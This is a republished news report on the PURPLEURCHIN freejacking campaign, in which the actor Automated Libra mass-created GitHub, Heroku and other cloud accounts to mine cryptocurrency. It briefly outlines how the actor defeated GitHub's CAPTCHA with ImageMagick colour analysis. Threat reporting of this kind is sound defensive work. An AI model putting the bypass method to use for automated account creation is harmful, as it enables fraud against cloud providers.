Subscribe to Updates

    Get the latest creative news from CRYPTO NOUNCE.

    What's Hot

    More layoff misery could be coming to Salesforce

    March 27, 2023

    Trading for Polygon (MATIC) and Ethereum Goes Live on Zero-Fee Decentralized Leverage Exchange COVO

    March 27, 2023

    Crypto exchange Binance and its CEO sued by CFTC over regulatory violations By Reuters

    March 27, 2023
    Facebook Twitter Instagram
    Facebook Twitter Instagram Vimeo
    Cryptonounce.com
    Contact
    • Business
      • Deals
      • investors
      • IPO
      • Startups
      • Wall Street
    • Markets
      • Bonds
      • Commodities & Futures
      • Currencies
      • Funds & ETFs
      • Stocks
    • Crypto
      • Alticoins News
      • Binance News
      • Bitcoins News
      • Blockchain News
      • Ethereum News
      • Token Sales News
      • XRP News
    • Technology
      • Artificial Intelligence
      • Big Data
      • Cloud Computing
      • Cybersecurity
      • Gaming
      • Internet of Things
      • Mobile
      • Social Media
      • Transportation
      • VR & AR
    • FinTech
    • Personal finance
    • Grides
      • Crypto
      • FinTech
      • Investing
      • Personal Finance Guides
      • Techonology
    • Tools
      • Coins
      • ICO List
      • Organigations
      • Events
    Cryptonounce.com
    Home » Hackers Using CAPTCHA Bypass Tactics in Freejacking Campaign on GitHub
    Cybersecurity

    Hackers Using CAPTCHA Bypass Tactics in Freejacking Campaign on GitHub

    AdmincryptBy AdmincryptJanuary 6, 2023No Comments3 Mins Read
    Facebook Twitter Pinterest LinkedIn Tumblr WhatsApp VKontakte Email
    Share
    Facebook Twitter LinkedIn Pinterest Email


    Jan 06, 2023Ravie LakshmananCryptocurrency / GitHub

    Freejacking Campaign

    A South Africa-based threat actor known as Automated Libra has been observed employing CAPTCHA bypass techniques to create GitHub accounts in a programmatic fashion as part of a freejacking campaign dubbed PURPLEURCHIN.

    The group “primarily targets cloud platforms offering limited-time trials of cloud resources in order to perform their crypto mining operations,” Palo Alto Networks Unit 42 researchers William Gamazo and Nathaniel Quist said.

    PURPLEURCHIN first came to light in October 2022 when Sysdig disclosed that the adversary created as many as 30 GitHub accounts, 2,000 Heroku accounts, and 900 Buddy accounts to scale its operation.

    Now according to Unit 42, the cloud threat actor group created three to five GitHub accounts every minute at the height of its activity in November 2022, totally setting up over 130,000 bogus accounts across Heroku, Togglebox, and GitHub.

    More than 22,000 GitHub accounts are estimated to have been created between September and November 2022: three in September, 1,652 in October, and 20,725 in November. A total of 100,723 unique Heroku accounts have also been identified.

    The cybersecurity company also termed the abuse of cloud resources as a “play and run” tactic designed to avoid paying the platform vendor’s bill by making use of falsified or stolen credit cards to create premium accounts.

    Its analysis of 250GB of data puts the earliest sign of the crypto campaign at least nearly 3.5 years ago in August 2019, in addition to uncovering the use of more than 40 wallets and seven different cryptocurrencies.

    Freejacking Campaign

    The core idea that undergirds PURPLEURCHIN is the exploitation of computational resources allocated to free and premium accounts on cloud services in order to reap monetary profits on a massive scale before losing access for non-payment of dues.

    Besides automating the account creation process by leveraging legitimate tools like xdotool and ImageMagick, the threat actor has also been found to take advantage of weakness within the CAPTCHA check on GitHub to further its illicit objectives.

    Freejacking Campaign

    This is accomplished by using ImageMagick’s convert command to transform the CAPTCHA images to their RGB complements, followed by using the identify command to extract the skewness of the red channel and selecting the smallest value.

    Once the account creation is successful, Automated Libra proceeds to create a GitHub repository and deploys workflows that make it possible to launch external Bash scripts and containers for initiating the crypto mining functions.

    The findings illustrate how the freejacking campaign can be weaponized to maximize returns by increasing the number of accounts that can be created per minute on these platforms.

    “It is important to note that Automated Libra designs their infrastructure to make the most use out of CD/CI tools,” the researchers concluded.

    “This is getting easier to achieve over time, as the traditional VSPs are diversifying their service portfolios to include cloud-related services. The availability of these cloud-related services makes it easier for threat actors, because they don’t have to maintain infrastructure to deploy their applications.”

    Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post.





    Source link

    Share. Facebook Twitter Pinterest LinkedIn Tumblr WhatsApp Email
    Previous ArticleHow Thomson Reuters delivers personalized content subscription plans at scale using Amazon Personalize
    Next Article Silvergate extends sell-off into 2nd day as Bank of America sees 35% downside after the crypto bank disclosed huge run on deposits
    Admincrypt
    • Website

    Related Posts

    20-Year-Old BreachForums Founder Faces Up to 5 Years in Prison

    March 27, 2023

    Where SSO Falls Short in Protecting SaaS

    March 27, 2023

    New MacStealer macOS Malware Steals iCloud Keychain Data and Passwords

    March 27, 2023

    Microsoft Issues Patch for aCropalypse Privacy Flaw in Windows Screenshot Tools

    March 27, 2023

    Leave A Reply Cancel Reply

    Our Picks
    • Facebook
    • Twitter
    • Pinterest
    • Instagram
    • YouTube
    • Vimeo
    Don't Miss
    Techonology

    More layoff misery could be coming to Salesforce

    By AdmincryptMarch 27, 20230

    On Friday, Bloomberg reported that more layoffs could be on the way at Salesforce, quoting…

    Trading for Polygon (MATIC) and Ethereum Goes Live on Zero-Fee Decentralized Leverage Exchange COVO

    March 27, 2023

    Crypto exchange Binance and its CEO sued by CFTC over regulatory violations By Reuters

    March 27, 2023

    MANA bulls begin to fade in strength after the loss of an important support

    March 27, 2023

    Subscribe to Updates

    Get the latest creative news from CRYPTO NOUNCE.

    NEWS
    • Business
    • Crypto
    • Blockchain
    • Markets
    • Technology
    FEATURED SECTIONS
    • Coins
    • ICO List
    • Organigations
    • Events
    • Grides
    FEATURED LINKS
    • Story of the day
    • Videos
    • Infographics
    CONNECT WITH US
    • Facebook
    • Twitter
    • Telegram
    • LinkedIn
    • Pinterest
    ABOUT US
    • Contact
    • Advertise
    • Sitemap
    Copyright © 2023 Cryptonounce All rights reserved. Cryptonounce.
    • Home
    • Buy Now

    Type above and press Enter to search. Press Esc to cancel.

    Sign In or Register

    Welcome Back!

    Login to your account below.

    Lost password?